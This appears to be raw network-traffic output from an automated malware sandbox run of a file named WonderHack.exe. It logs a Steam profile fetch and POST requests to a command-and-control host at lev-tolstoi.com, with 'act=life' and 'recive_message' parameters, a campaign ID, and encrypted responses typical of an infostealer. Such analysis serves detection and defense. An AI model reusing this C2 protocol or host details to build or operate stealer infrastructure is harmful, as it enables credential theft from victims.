                                                                                                                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                                                                                                                        • lev-tolstoi.com
                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        0192.168.2.44976023.55.153.1064433696C:\Users\user\Desktop\WonderHack.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-22 23:49:09 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                                                                        2024-12-22 23:49:10 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Date: Sun, 22 Dec 2024 23:49:09 GMT
                                                                                                                                                                                                                                                                        Content-Length: 35121
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: sessionid=32d8a0bc1b3577f29e8cdb62; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                        2024-12-22 23:49:10 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                                        2024-12-22 23:49:10 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                                        Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                                        2024-12-22 23:49:10 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                                        Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        1192.168.2.449765104.21.66.864433696C:\Users\user\Desktop\WonderHack.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-22 23:49:11 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-22 23:49:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                                                                                                        2024-12-22 23:49:12 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sun, 22 Dec 2024 23:49:12 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=o8c3fdkaqdp8ngt4do7ml21de0; expires=Thu, 17 Apr 2025 17:35:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ECMYctyjqywhYQ%2FFVpHcos%2FNaIWCBeptWEo2rzP0aMxhD5WA%2FT%2BBWhhKIxO9Dj7D1DsU%2BeAeVpjkNo1jId3jsCcb%2FnPpGJeSpI2NeWPxLa41xeVPGvPcZE5wWaJXYA7DWlo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6401cdff9f8ca7-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1818&min_rtt=1810&rtt_var=695&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1557333&cwnd=128&unsent_bytes=0&cid=23fe6ec199d31886&ts=768&x=0"
                                                                                                                                                                                                                                                                        2024-12-22 23:49:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                                                                                                        2024-12-22 23:49:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        2192.168.2.449771104.21.66.864433696C:\Users\user\Desktop\WonderHack.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-22 23:49:13 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 54
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-22 23:49:13 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 79 62 7a 6b 6c 7a 70 61 6e 6c 77 70 26 6a 3d
                                                                                                                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--ybzklzpanlwp&j=
                                                                                                                                                                                                                                                                        2024-12-22 23:49:14 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sun, 22 Dec 2024 23:49:14 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=kl3o0jvg739rmndcspstg5n76j; expires=Thu, 17 Apr 2025 17:35:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kA5LjRUjAHjbD3UPx949pT6mAz5CZ%2B%2FWlCPz%2Bg6OKfmgNHDwyO5WArjW%2FIMM2WjmOggowHPfMMZkq9EWULexuPwyPjg7FTt9ys1nxK6ZLnEZOGQfSn%2FYC1eFTGbr3bz7%2Bbc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6401db0c3df797-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1528&rtt_var=574&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=953&delivery_rate=1902280&cwnd=161&unsent_bytes=0&cid=bd47d09b9d602e3b&ts=776&x=0"
                                                                                                                                                                                                                                                                        2024-12-22 23:49:14 UTC240INData Raw: 34 39 31 63 0d 0a 4e 42 37 2b 77 50 62 77 64 59 70 4d 74 79 47 50 4f 51 49 79 6a 57 2b 36 78 58 4d 6a 74 30 30 4a 31 72 43 70 76 42 58 4f 6c 5a 56 50 50 49 6a 69 7a 4d 52 5a 71 44 2f 53 41 37 56 4e 63 45 66 6f 51 35 69 6b 46 77 47 4e 4b 32 69 36 77 38 79 51 4e 37 6a 34 74 77 35 34 6e 36 79 46 6c 56 6d 6f 4b 63 38 44 74 57 4a 35 45 4f 67 42 6d 50 39 52 52 74 30 76 61 4c 72 53 79 4e 64 36 76 76 6e 32 58 48 4b 5a 71 4a 4f 54 45 65 73 67 32 6b 54 71 58 47 4e 59 34 77 62 58 72 52 34 42 6d 32 39 73 72 4a 4b 54 6e 6c 69 72 34 66 52 35 66 34 32 72 31 49 31 5a 38 57 37 53 54 36 30 44 49 46 50 6f 44 64 61 6a 46 30 6a 66 4a 57 47 79 30 38 33 57 5a 61 66 7a 2f 56 78 38 6d 71 6d 5a 6d 67 58 6d 4b 74 31 50 37 46 5a 6a 45 4b
                                                                                                                                                                                                                                                                        Data Ascii: 491cNB7+wPbwdYpMtyGPOQIyjW+6xXMjt00J1rCpvBXOlZVPPIjizMRZqD/SA7VNcEfoQ5ikFwGNK2i6w8yQN7j4tw54n6yFlVmoKc8DtWJ5EOgBmP9RRt0vaLrSyNd6vvn2XHKZqJOTEesg2kTqXGNY4wbXrR4Bm29srJKTnlir4fR5f42r1I1Z8W7ST60DIFPoDdajF0jfJWGy083WZafz/Vx8mqmZmgXmKt1P7FZjEK
                                                                                                                                                                                                                                                                        2024-12-22 23:49:14 UTC1369INData Raw: 46 4e 33 37 39 52 47 5a 56 38 57 62 66 44 32 73 74 36 76 50 47 33 53 54 4b 46 34 70 4f 65 56 37 42 75 33 55 2f 6a 58 6d 4e 66 36 41 7a 59 74 52 35 42 31 69 64 6a 73 4e 6a 45 30 58 69 69 2f 66 42 65 64 5a 75 74 6b 35 6f 52 35 79 32 56 44 61 31 63 65 42 43 33 54 66 69 33 45 6b 4c 42 49 6e 72 30 7a 59 58 48 4e 36 76 37 74 77 34 38 6d 71 79 56 6e 78 66 36 4a 74 35 49 36 45 6c 72 57 65 49 41 32 4b 6f 62 54 74 59 76 62 4c 37 59 78 4e 52 7a 6f 66 72 78 56 6e 7a 63 37 4e 53 56 44 36 68 32 6c 57 44 6f 53 32 64 63 2b 55 2f 69 35 77 34 50 7a 47 39 73 75 4a 4b 54 6e 6e 2b 70 39 50 52 64 63 35 2b 71 6e 34 41 58 2b 69 6a 59 52 76 39 64 5a 56 37 6c 44 73 71 74 48 30 66 57 4a 6d 43 39 31 38 7a 61 4e 2b 4b 33 38 45 34 38 78 4f 4b 31 6e 78 7a 6b 4a 4d 4a 44 72 55 51 75 53
                                                                                                                                                                                                                                                                        Data Ascii: FN379RGZV8WbfD2st6vPG3STKF4pOeV7Bu3U/jXmNf6AzYtR5B1idjsNjE0Xii/fBedZutk5oR5y2VDa1ceBC3Tfi3EkLBInr0zYXHN6v7tw48mqyVnxf6Jt5I6ElrWeIA2KobTtYvbL7YxNRzofrxVnzc7NSVD6h2lWDoS2dc+U/i5w4PzG9suJKTnn+p9PRdc5+qn4AX+ijYRv9dZV7lDsqtH0fWJmC918zaN+K38E48xOK1nxzkJMJDrUQuS
                                                                                                                                                                                                                                                                        2024-12-22 23:49:14 UTC1369INData Raw: 72 47 30 66 61 49 6d 66 30 6e 49 76 5a 62 2b 79 76 74 33 78 2f 69 4b 47 65 30 43 4c 72 49 4e 74 45 2b 78 74 2f 48 76 5a 4e 33 36 74 52 47 5a 55 69 61 72 7a 55 32 64 46 36 72 2f 6e 35 57 58 6d 54 71 70 53 53 47 75 30 71 33 6b 6a 75 56 6d 52 43 35 51 33 51 6f 68 42 4c 33 32 38 6c 39 4e 58 54 6e 69 2f 73 78 75 42 64 50 71 6d 68 6d 70 77 51 2f 6d 37 4b 44 66 51 62 5a 31 79 76 56 5a 69 71 47 55 54 51 49 47 71 2b 33 4d 37 55 65 36 54 35 39 45 52 7a 6d 4b 4b 59 6d 68 33 6c 49 4e 46 4c 35 46 42 72 56 75 38 4d 30 75 64 66 41 64 49 33 4b 2b 79 53 2f 39 6c 37 6f 66 69 31 59 33 2b 53 72 4a 4f 45 56 2f 64 67 7a 41 50 71 56 79 41 49 72 77 48 52 70 78 70 4c 30 53 39 73 75 64 66 49 32 58 53 68 38 50 31 59 65 35 69 75 6e 5a 38 52 36 43 6e 52 52 76 39 65 61 56 7a 6a 54 5a
                                                                                                                                                                                                                                                                        Data Ascii: rG0faImf0nIvZb+yvt3x/iKGe0CLrINtE+xt/HvZN36tRGZUiarzU2dF6r/n5WXmTqpSSGu0q3kjuVmRC5Q3QohBL328l9NXTni/sxuBdPqmhmpwQ/m7KDfQbZ1yvVZiqGUTQIGq+3M7Ue6T59ERzmKKYmh3lINFL5FBrVu8M0udfAdI3K+yS/9l7ofi1Y3+SrJOEV/dgzAPqVyAIrwHRpxpL0S9sudfI2XSh8P1Ye5iunZ8R6CnRRv9eaVzjTZ
                                                                                                                                                                                                                                                                        2024-12-22 23:49:14 UTC1369INData Raw: 79 6d 46 79 39 4e 58 48 6e 69 2f 73 2f 76 35 45 63 70 4b 72 6d 5a 51 66 37 79 44 59 53 4f 74 51 5a 31 66 70 41 4e 43 71 46 45 4c 55 4b 32 47 6d 30 63 44 55 65 71 61 33 75 52 5a 37 68 4f 4c 4d 30 6a 44 6b 42 38 56 59 2f 30 30 67 54 36 45 55 6d 4b 41 64 41 59 31 76 61 4c 76 62 78 4e 5a 2f 6f 2f 6a 7a 57 48 71 61 72 35 47 64 48 66 6f 6d 32 30 37 6d 56 47 74 43 37 77 44 63 71 78 56 4a 33 69 55 72 2b 70 4c 4d 78 6a 66 30 74 38 4a 62 63 35 79 68 67 74 49 49 70 6a 65 56 52 4f 45 62 4f 42 44 6a 41 39 69 6f 48 55 33 65 4a 32 71 34 33 4d 7a 62 66 71 54 2f 35 56 64 34 6c 4b 4f 61 6e 52 62 73 4b 39 42 48 36 6c 39 6d 58 36 39 44 6d 4b 41 4a 41 59 31 76 52 4a 50 6e 69 66 39 4e 37 4f 69 35 54 7a 79 62 72 74 54 4b 56 2b 51 74 32 55 76 69 58 57 6c 63 35 51 54 54 71 78 70
                                                                                                                                                                                                                                                                        Data Ascii: ymFy9NXHni/s/v5EcpKrmZQf7yDYSOtQZ1fpANCqFELUK2Gm0cDUeqa3uRZ7hOLM0jDkB8VY/00gT6EUmKAdAY1vaLvbxNZ/o/jzWHqar5GdHfom207mVGtC7wDcqxVJ3iUr+pLMxjf0t8Jbc5yhgtIIpjeVROEbOBDjA9ioHU3eJ2q43MzbfqT/5Vd4lKOanRbsK9BH6l9mX69DmKAJAY1vRJPnif9N7Oi5TzybrtTKV+Qt2UviXWlc5QTTqxp
                                                                                                                                                                                                                                                                        2024-12-22 23:49:14 UTC1369INData Raw: 37 48 64 79 74 39 78 76 76 44 2b 52 48 4b 52 72 5a 79 61 48 75 6b 71 30 45 37 72 56 32 70 52 36 41 50 57 72 31 45 50 6c 53 68 7a 39 49 71 4c 2f 32 65 33 35 65 46 62 58 5a 47 74 31 49 31 5a 38 57 37 53 54 36 30 44 49 46 6e 39 43 64 57 31 47 45 62 62 49 47 69 6d 30 38 62 56 5a 61 76 34 38 31 46 77 6d 71 32 53 6b 78 4c 69 49 74 4a 47 35 6c 52 73 45 4b 46 4e 33 37 39 52 47 5a 55 42 59 4b 66 46 79 4e 42 38 75 75 79 33 53 54 4b 46 34 70 4f 65 56 37 42 75 31 6b 6a 6d 58 32 42 63 37 77 6e 56 70 77 4e 4f 30 69 68 69 76 38 44 42 32 58 43 6e 2f 2f 78 5a 65 6f 36 75 6d 6f 41 53 2b 6a 79 56 44 61 31 63 65 42 43 33 54 65 36 67 41 56 48 57 62 56 71 69 30 64 33 56 65 71 43 33 36 42 68 6c 33 4b 57 59 30 6b 2b 6f 4b 4e 70 4b 37 6c 52 68 57 65 4d 41 33 61 34 55 51 4e 4d 72
                                                                                                                                                                                                                                                                        Data Ascii: 7Hdyt9xvvD+RHKRrZyaHukq0E7rV2pR6APWr1EPlShz9IqL/2e35eFbXZGt1I1Z8W7ST60DIFn9CdW1GEbbIGim08bVZav481Fwmq2SkxLiItJG5lRsEKFN379RGZUBYKfFyNB8uuy3STKF4pOeV7Bu1kjmX2Bc7wnVpwNO0ihiv8DB2XCn//xZeo6umoAS+jyVDa1ceBC3Te6gAVHWbVqi0d3VeqC36Bhl3KWY0k+oKNpK7lRhWeMA3a4UQNMr
                                                                                                                                                                                                                                                                        2024-12-22 23:49:14 UTC1369INData Raw: 6a 46 4e 37 4f 35 37 68 5a 37 6b 4f 4c 4d 30 68 54 76 4c 64 52 4a 35 46 64 76 56 2b 73 66 30 71 41 44 51 4e 51 6b 5a 72 6a 53 78 74 4e 39 72 66 37 36 57 6e 47 62 70 5a 75 58 56 36 5a 75 30 6c 75 74 41 79 42 78 34 67 62 55 2f 45 73 42 79 6d 46 79 39 4e 58 48 6e 69 2f 73 39 2f 31 54 64 70 47 68 6d 35 45 46 36 53 6a 48 51 2b 42 52 63 6c 72 6b 43 4e 57 71 48 45 4c 54 4b 57 43 34 77 4d 4c 65 64 4b 65 33 75 52 5a 37 68 4f 4c 4d 30 6a 54 2f 4f 4e 39 45 34 55 31 72 55 65 77 62 31 62 64 52 44 35 55 2b 62 4b 57 53 6b 38 68 6e 75 2f 44 6f 47 47 58 63 70 5a 6a 53 54 36 67 6f 33 45 58 71 58 57 35 43 36 67 76 58 71 42 68 49 30 53 64 6f 74 4e 62 50 32 58 4b 76 2b 2f 78 52 66 35 4f 6d 6e 5a 77 65 35 32 36 62 41 2b 70 44 49 41 69 76 4c 4d 4f 6b 48 55 79 56 4d 43 57 74 6b
                                                                                                                                                                                                                                                                        Data Ascii: jFN7O57hZ7kOLM0hTvLdRJ5FdvV+sf0qADQNQkZrjSxtN9rf76WnGbpZuXV6Zu0lutAyBx4gbU/EsBymFy9NXHni/s9/1TdpGhm5EF6SjHQ+BRclrkCNWqHELTKWC4wMLedKe3uRZ7hOLM0jT/ON9E4U1rUewb1bdRD5U+bKWSk8hnu/DoGGXcpZjST6go3EXqXW5C6gvXqBhI0SdotNbP2XKv+/xRf5OmnZwe526bA+pDIAivLMOkHUyVMCWtk
                                                                                                                                                                                                                                                                        2024-12-22 23:49:14 UTC1369INData Raw: 72 37 37 63 4f 50 4c 79 70 67 70 63 51 2f 6d 7a 67 51 4f 4e 56 5a 30 61 76 45 75 66 70 55 55 37 50 62 7a 4f 4e 79 34 76 5a 65 2b 79 76 74 30 4e 37 6e 4b 57 4f 68 42 44 6b 50 39 35 4f 34 58 6c 76 56 2f 6b 4f 31 36 51 41 53 4a 6b 6b 5a 76 53 63 69 39 6c 76 37 4b 2b 33 65 58 75 4b 6f 62 75 52 42 75 46 75 6d 77 50 71 54 53 41 49 72 7a 4f 59 74 52 4a 52 31 69 42 36 69 70 4b 54 78 30 6e 73 2f 4f 46 52 62 4a 2b 30 6e 35 38 62 2b 52 43 56 47 37 6b 4a 4d 67 4b 39 58 38 66 6e 44 6e 36 62 62 32 72 30 69 76 4c 48 4e 37 71 33 72 77 51 79 33 4c 44 55 79 6c 65 76 4c 63 64 52 36 31 68 32 55 36 67 7a 35 6f 41 48 53 39 49 2f 62 4b 50 64 69 35 41 33 6f 37 65 76 62 7a 79 56 70 59 2b 44 41 65 55 2b 30 67 50 53 46 53 42 49 72 31 57 59 6b 68 4a 50 32 79 68 39 70 5a 2f 73 79 48
                                                                                                                                                                                                                                                                        Data Ascii: r77cOPLypgpcQ/mzgQONVZ0avEufpUU7PbzONy4vZe+yvt0N7nKWOhBDkP95O4XlvV/kO16QASJkkZvSci9lv7K+3eXuKobuRBuFumwPqTSAIrzOYtRJR1iB6ipKTx0ns/OFRbJ+0n58b+RCVG7kJMgK9X8fnDn6bb2r0ivLHN7q3rwQy3LDUylevLcdR61h2U6gz5oAHS9I/bKPdi5A3o7evbzyVpY+DAeU+0gPSFSBIr1WYkhJP2yh9pZ/syH
                                                                                                                                                                                                                                                                        2024-12-22 23:49:14 UTC1369INData Raw: 61 48 32 52 72 64 69 63 48 4f 67 70 78 56 58 32 46 32 68 54 39 52 66 6d 6d 54 70 4e 30 79 68 78 73 39 54 74 2f 6a 66 69 74 2f 67 57 4a 4b 58 69 33 4e 49 6f 70 6d 37 4e 41 37 55 62 56 56 50 68 41 39 2b 78 41 41 7a 39 44 46 47 4f 6b 4f 66 5a 59 75 37 44 38 45 5a 74 6c 36 2b 59 30 6c 6d 6f 4b 4a 55 62 76 52 55 67 56 50 35 4e 67 50 64 44 47 6f 42 38 50 4f 53 41 31 4a 42 75 37 4f 47 33 44 69 37 53 34 6f 62 53 54 36 68 70 31 6c 48 2f 58 57 4e 47 37 45 72 6d 6d 54 5a 50 30 69 35 39 70 4d 58 45 34 45 6d 35 39 50 6c 59 65 34 71 7a 31 4e 78 58 35 32 36 4e 65 71 30 54 49 47 2b 68 54 63 44 6e 53 51 48 67 4c 47 57 36 31 64 33 50 4f 6f 76 35 38 46 64 71 6a 4c 57 62 30 6c 6d 6f 4b 4a 55 62 76 78 55 67 56 50 35 4e 67 50 64 44 47 6f 42 38 50 4f 53 41 31 4a 42 75 37 4f 47
                                                                                                                                                                                                                                                                        Data Ascii: aH2RrdicHOgpxVX2F2hT9RfmmTpN0yhxs9Tt/jfit/gWJKXi3NIopm7NA7UbVVPhA9+xAAz9DFGOkOfZYu7D8EZtl6+Y0lmoKJUbvRUgVP5NgPdDGoB8POSA1JBu7OG3Di7S4obST6hp1lH/XWNG7ErmmTZP0i59pMXE4Em59PlYe4qz1NxX526Neq0TIG+hTcDnSQHgLGW61d3POov58FdqjLWb0lmoKJUbvxUgVP5NgPdDGoB8POSA1JBu7OG
                                                                                                                                                                                                                                                                        2024-12-22 23:49:14 UTC1369INData Raw: 4b 2b 62 6c 56 58 49 4b 63 4e 41 72 52 55 67 58 4b 39 56 6d 4b 59 62 55 64 67 67 62 50 6a 56 30 64 6b 33 34 72 66 35 46 69 54 63 6f 35 36 43 47 75 63 70 6d 55 58 6a 56 53 42 50 6f 52 53 59 73 56 45 5a 68 6d 45 72 70 70 4b 54 6e 6a 43 76 35 65 56 51 66 34 71 68 30 36 77 70 78 54 7a 53 55 2b 34 5a 55 56 33 72 47 38 32 6b 41 55 62 72 45 55 61 6d 31 64 76 64 4e 5a 33 68 39 46 5a 79 6d 2b 4c 61 30 67 2b 6f 64 70 56 75 2f 31 78 77 55 36 39 44 6d 4b 74 52 47 5a 55 69 65 62 50 43 79 4a 4a 77 74 76 43 33 53 54 4b 46 34 6f 4c 53 54 37 74 67 6c 56 47 74 41 79 41 58 34 51 44 5a 70 42 39 43 78 7a 31 74 74 38 54 49 6d 55 6d 53 32 75 56 52 62 4a 2f 67 70 5a 38 54 2f 6a 76 57 55 2b 70 6c 58 6e 33 39 43 73 69 6b 55 32 33 53 49 6d 65 4b 37 50 7a 50 63 4c 79 31 30 56 56 71
